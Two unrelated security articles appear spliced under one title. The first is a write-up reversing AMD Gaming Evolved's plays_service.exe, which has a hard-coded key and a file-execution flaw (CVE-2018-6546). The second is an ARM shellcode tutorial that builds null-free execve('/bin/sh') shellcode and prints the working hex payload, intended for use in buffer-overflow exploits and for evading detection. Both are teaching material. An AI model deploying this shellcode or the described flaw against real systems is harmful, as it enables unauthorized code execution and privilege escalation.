AMD Gaming Evolved exploiting

Background

For anyone running an AMD GPU from a few years back, you’ve probably come across a piece of software installed on your computer from Raptr, Inc. If you don’t remember installing it, it’s because for several years it was installed silently along-side your AMD drivers. The software was marketed to the gaming community and labeled AMD Gaming Evolved. While I haven’t ever actually used the software, I’ve gathered that it allowed you to tweak your GPU as well as record your gameplay using another application called playstv.

I personally discovered the software while performing a routine check of what software running on my PC was listening for inbound connections. I try to make it a point to at least give a minimal amount of attention to any software I find accepting connections from outside of my PC. However, when I originally discovered this, my free time was scarce so I just made a note of it and uninstalled the software. The following screenshot shows the plays_service.exe binary listening on all interfaces on what appears to be an ephemeral port.

Fast forward two years, I update my AMD drivers and notice plays_service.exe” has shown up on my computer again. This time I decide to give it a little more attention.

Reversing – Windows Service

Opening up plays_service.exe in IDA, we see the usual boiler plate service code and trace it down to the main entry point. From here we almost immediately recognize that this application is python based and has been packaged with something like py2exe. While decompiling python byte code is rather trivial, the trick with these types of executables is identifying and locating the python classes. Python byte-code in a py2exe packaged binary is typically embedded in the executable or loaded from some relative path on disk. At this point, I usually open up the strings subview in IDA to see if anything obvious jumps out.

I see at least a few interesting string references that are worth investigating. Several of them look like they may have something to do with the initialization of python. The first string I track down is “Unable to create Python obj for executable name!” . At first glance it appears to be an error message if certain python objects aren’t created properly. Scrolling up in the function it references, I see the following code.

This function appears to be the python setup routine. Returning to my list of strings, I see several references to zip.

%s%cpython%d%d.zip
zipimport
cannot import zipimport module
zipimporter

I decided to search through the install directory and see if there were any zip files present. Success, only one zip file exists and it is named python35.zip! It’s filename also matches the format string of one of the string references above. I unzip the file and peruse its contents. The zip file contains thousands of compiled bytecode python files which I presume to be the applications core source code and library dependencies.

Reversing – Compiled Python

Looking through the compiled python files, I see three that may be the service’s source code.

I decompiled each of the files using uncompyle6 and opened them up in a text editor. The largest of the three, plays_service.pyc, turned out to be the main service source. The service is a basic HTTP server made up of a few simple classes. It binds to an ephermal port on startup and writes the port to the registry to be used by the greater application. The POST request handler code is listed below.

The handler expects a JSON formatted POST request with a couple of parameters. The first is the data parameter which holds the command to be processed. The second is a hash value of the data provided and a secret key. Lucky for us, the secret key just so happens to be hard-coded in the class definition. If the computed hash matches the one provided, the handler calls one of two defined command function, “extract_files” or “execute_installer”. From here I began to look at the “execute_installer” function because the name sounded quite promising.

The function logic is pretty straight forward. It performs a couple insignificant checks, resolves two paths passed as parameters to the POST request, and then calls CreateProcess. The most important detail of note is that while it looks like a fully controlled command injection is possible, the calls to win32api.GetShortPathName throw an exception if the parameter passed does not resolve to a file. This limits the exploitation of this vulnerability significantly but still allows for privilege escalation to SYSTEM and remote compromise using anonymous outbound SMB.

Exploit

Exploiting this “feature” for file execution didn’t take a significant amount of work. The only real requirements were properly setting up the POST request and hashing the right portion of data. A proof of concept for achieving file execution with this vulnerability (CVE-2018-6546) can be found here.

WRITING ARM SHELLCODE

INTRODUCTION TO WRITING ARM SHELLCODE

 

This tutorial is for people who think beyond running automated shellcode generators and want to learn how to write shellcode in ARM assembly themselves. After all, knowing how it works under the hood and having full control over the result is much more fun than simply running a tool, isn’t it? Writing your own shellcode in assembly is a skill that can turn out to be very useful in scenarios where you need to bypass shellcode-detection algorithms or other restrictions where automated tools could turn out to be insufficient. The good news is, it’s a skill that can be learned quite easily once you are familiar with the process.

For this tutorial we will use the following tools (most of them should be installed by default on your Linux distribution):

  • GDB – our debugger of choice
  • GEF –  GDB Enhanced Features, highly recommended (created by @_hugsy_)
  • GCC – Gnu Compiler Collection
  • as – assembler
  • ld – linker
  • strace – utility to trace system calls
  • objdump – to check for null-bytes in the disassembly
  • objcopy – to extract raw shellcode from ELF binary

Make sure you compile and run all the examples in this tutorial in an ARM environment.

Before you start writing your shellcode, make sure you are aware of some basic principles, such as:

  1. You want your shellcode to be compact and free of null-bytes
    • Reason: We are writing shellcode that we will use to exploit memory corruption vulnerabilities like buffer overflows. Some buffer overflows occur because of the use of the C function ‘strcpy’. Its job is to copy data until it receives a null-byte. We use the overflow to take control over the program flow and if strcpy hits a null-byte it will stop copying our shellcode and our exploit will not work.
  2. You also want to avoid library calls and absolute memory addresses
    • Reason: To make our shellcode as universal as possible, we can’t rely on library calls that require specific dependencies and absolute memory addresses that depend on specific environments.

The Process of writing shellcode involves the following steps:

  1. Knowing what system calls you want to use
  2. Figuring out the syscall number and the parameters your chosen syscall function requires
  3. De-Nullifying your shellcode
  4. Converting your shellcode into a Hex string
UNDERSTANDING SYSTEM FUNCTIONS

Before diving into our first shellcode, let’s write a simple ARM assembly program that outputs a string. The first step is to look up the system call we want to use, which in this case is “write”. The prototype of this system call can be looked up in the Linux man pages:

ssize_t write(int fd, const void *buf, size_t count);

From the perspective of a high level programming language like C, the invocation of this system call would look like the following:

const char string[13] = "Azeria Labs\n";
write(1, string, sizeof(string));        // Here sizeof(string) is 13

Looking at this prototype, we can see that we need the following parameters:

  • fd – 1 for STDOUT
  • buf – pointer to a string
  • count – number of bytes to write -> 13
  • syscall number of write -> 0x4

For the first 3 parameters we can use R0, R1, and R2. For the syscall we need to use R7 and move the number 0x4 into it.

mov   r0, #1      @ fd 1 = STDOUT
ldr   r1, string  @ loading the string from memory to R1
mov   r2, #13     @ write 13 bytes to STDOUT 
mov   r7, #4      @ Syscall 0x4 = write()
svc   #0

Using the snippet above, a functional ARM assembly program would look like the following:

.data
string: .asciz "Azeria Labs\n"  @ .asciz adds a null-byte to the end of the string
after_string:
.set size_of_string, after_string - string

.text
.global _start

_start:
   mov r0, #1               @ STDOUT
   ldr r1, addr_of_string   @ memory address of string
   mov r2, #size_of_string  @ size of string
   mov r7, #4               @ write syscall
   swi #0                   @ invoke syscall

_exit:
   mov r7, #1               @ exit syscall
   swi 0                    @ invoke syscall

addr_of_string: .word string

In the data section we calculate the size of our string by subtracting the address at the beginning of the string from the address after the string. This, of course, is not necessary if we would just calculate the string size manually and put the result directly into R2. To exit our program we use the system call exit() which has the syscall number 1.

Compile and execute:

azeria@labs:~$ as write.s -o write.o && ld write.o -o write
azeria@labs:~$ ./write
Azeria Labs

Cool. Now that we know the process, let’s look into it in more detail and write our first simple shellcode in ARM assembly.

1. TRACING SYSTEM CALLS

For our first example we will take the following simple function and transform it into ARM assembly:

#include <stdio.h>

void main(void)
{
    system("/bin/sh");
}

The first step is to figure out what system calls this function invokes and what parameters are required by the system call. With ‘strace’ we can monitor our program’s system calls to the Kernel of the OS.

Save the code above in a file and compile it before running the strace command on it.

azeria@labs:~$ gcc system.c -o system
azeria@labs:~$ strace -h
-f -- follow forks, -ff -- with output into separate files
-v -- verbose mode: print unabbreviated argv, stat, termio[s], etc. args
--- snip --
azeria@labs:~$ strace -f -v system
--- snip --
[pid 4575] execve("/bin/sh", ["/bin/sh"], ["MAIL=/var/mail/pi", "SSH_CLIENT=192.168.200.1 42616 2"..., "USER=pi", "SHLVL=1", "OLDPWD=/home/azeria", "HOME=/home/azeria", "XDG_SESSION_COOKIE=34069147acf8a"..., "SSH_TTY=/dev/pts/1", "LOGNAME=pi", "_=/usr/bin/strace", "TERM=xterm", "PATH=/usr/local/sbin:/usr/local/"..., "LANG=en_US.UTF-8", "LS_COLORS=rs=0:di=01;34:ln=01;36"..., "SHELL=/bin/bash", "EGG=AAAAAAAAAAAAAAAAAAAAAAAAAAAA"..., "LC_ALL=en_US.UTF-8", "PWD=/home/azeria/", "SSH_CONNECTION=192.168.200.1 426"...]) = 0
--- snip --
[pid 4575] write(2, "$ ", 2$ ) = 2
[pid 4575] read(0, exit
--- snip --
exit_group(0) = ?
+++ exited with 0 +++

Turns out, the system function execve() is being invoked.

2. SYSCALL NUMBER AND PARAMETERS

The next step is to figure out the syscall number of execve() and the parameters this function requires. You can get a nice overview of system calls at w3calls or by searching through Linux man pages. Here’s what we get from the man page of execve():

NAME
    execve - execute program
SYNOPSIS

    #include <unistd.h>

    int  execve(const char *filename, char *const argv [], char *const envp[]);

The parameters execve() requires are:

  • Pointer to a string specifying the path to a binary
  • argv[] – array of command line variables
  • envp[] – array of environment variables

Which basically translates to: execve(*filename, *argv[], *envp[]) –> execve(*filename, 0, 0). The system call number of this function can be looked up with the following command:

azeria@labs:~$ grep execve /usr/include/arm-linux-gnueabihf/asm/unistd.h 
#define __NR_execve (__NR_SYSCALL_BASE+ 11)

Looking at the output you can see that the syscall number of execve() is 11. Register R0 to R2 can be used for the function parameters and register R7 will store the syscall number.

Invoking system calls on x86 works as follows: First, you PUSH parameters on the stack. Then, the syscall number gets moved into EAX (MOV EAX, syscall_number). And lastly, you invoke the system call with SYSENTER / INT 80.

On ARM, syscall invocation works a little bit differently:

  1. Move parameters into registers – R0, R1, ..
  2. Move the syscall number into register R7
    • mov  r7, #<syscall_number>
  3. Invoke the system call with
    • SVC #0 or
    • SVC #1
  4. The return value ends up in R0

This is how it looks like in ARM Assembly (Code uploaded to the azeria-labs Github account):

As you can see in the picture above, we start with pointing R0 to our “/bin/sh” string by using PC-relative addressing (If you can’t remember why the effective PC starts two instructions ahead of the current one, go to ‘‘Data Types and Registers‘ of the assembly basics tutorial and look at part where the PC register is explained along with an example). Then we move 0’s into R1 and R2 and move the syscall number 11 into R7. Looks easy, right? Let’s look at the disassembly of our first attempt using objdump:

azeria@labs:~$ as execve1.s -o execve1.o
azeria@labs:~$ objdump -d execve1.o
execve1.o: file format elf32-littlearm

Disassembly of section .text:

00000000 <_start>:
 0: e28f000c add r0, pc, #12
 4: e3a01000 mov r1, #0
 8: e3a02000 mov r2, #0
 c: e3a0700b mov r7, #11
 10: ef000000 svc 0x00000000
 14: 6e69622f .word 0x6e69622f
 18: 0068732f .word 0x0068732f

Turns out we have quite a lot of null-bytes in our shellcode. The next step is to de-nullify the shellcode and replace all operations that involve.

3. DE-NULLIFYING SHELLCODE

One of the techniques we can use to make null-bytes less likely to appear in our shellcode is to use Thumb mode. Using Thumb mode decreases the chances of having null-bytes, because Thumb instructions are 2 bytes long instead of 4. If you went through the ARM Assembly Basics tutorials you know how to switch from ARM to Thumb mode. If you haven’t I encourage you to read the chapter about the branching instructions “B / BX / BLX” in part 6 of the tutorial “Conditional Execution and Branching“.

In our second attempt we use Thumb mode and replace the operations containing #0’s with operations that result in 0’s by subtracting registers from each other or xor’ing them. For example, instead of using “mov  r1, #0”, use either “sub  r1, r1, r1” (r1 = r1 – r1) or “eor  r1, r1, r1” (r1 = r1 xor r1). Keep in mind that since we are now using Thumb mode (2 byte instructions) and our code must be 4 byte aligned, we need to add a NOP at the end (e.g. mov  r5, r5).

(Code available on the azeria-labs Github account):

The disassembled code looks like the following:

The result is that we only have one single null-byte that we need to get rid of. The part of our code that’s causing the null-byte is the null-terminated string “/bin/sh\0”. We can solve this issue with the following technique:

  • Replace “/bin/sh\0” with “/bin/shX”
  • Use the instruction strb (store byte) in combination with an existing zero-filled register to replace X with a null-byte

(Code available on the azeria-labs Github account):

Voilà – no null-bytes!

4. TRANSFORM SHELLCODE INTO HEX STRING

The shellcode we created can now be transformed into it’s hexadecimal representation. Before doing that, it is a good idea to check if the shellcode works as a standalone. But there’s a problem: if we compile our assembly file like we would normally do, it won’t work. The reason for this is that we use the strb operation to modify our code section (.text). This requires the code section to be writable and can be achieved by adding the -N flag during the linking process.

azeria@labs:~$ ld --help
--- snip --
-N, --omagic        Do not page align data, do not make text readonly.
--- snip -- 
azeria@labs:~$ as execve3.s -o execve3.o && ld -N execve3.o -o execve3
azeria@labs:~$ ./execve3
$ whoami
azeria

It works! Congratulations, you’ve written your first shellcode in ARM assembly.

To convert it into hex, use the following commands:

azeria@labs:~$ objcopy -O binary execve3 execve3.bin 
azeria@labs:~$ hexdump -v -e '"\\""x" 1/1 "%02x" ""' execve3.bin 
\x01\x30\x8f\xe2\x13\xff\x2f\xe1\x02\xa0\x49\x40\x52\x40\xc2\x71\x0b\x27\x01\xdf\x2f\x62\x69\x6e\x2f\x73\x68\x78

Instead of using the hexdump command above, you also do the same with a simple python script:

#!/usr/bin/env python

import sys

binary = open(sys.argv[1],'rb')

for byte in binary.read():
 sys.stdout.write("\\x"+byte.encode("hex"))

print ""
azeria@labs:~$ ./shellcode.py execve3.bin
\x01\x30\x8f\xe2\x13\xff\x2f\xe1\x02\xa0\x49\x40\x52\x40\xc2\x71\x0b\x27\x01\xdf\x2f\x62\x69\x6e\x2f\x73\x68\x78

I hope you enjoyed this introduction into writing ARM shellcode. In the next part you will learn how to write shellcode in form of a reverse-shell, which is a little bit more complicated than the example above. After that we will dive into memory corruptions and learn how they occur and how to exploit them using our self-made shellcode.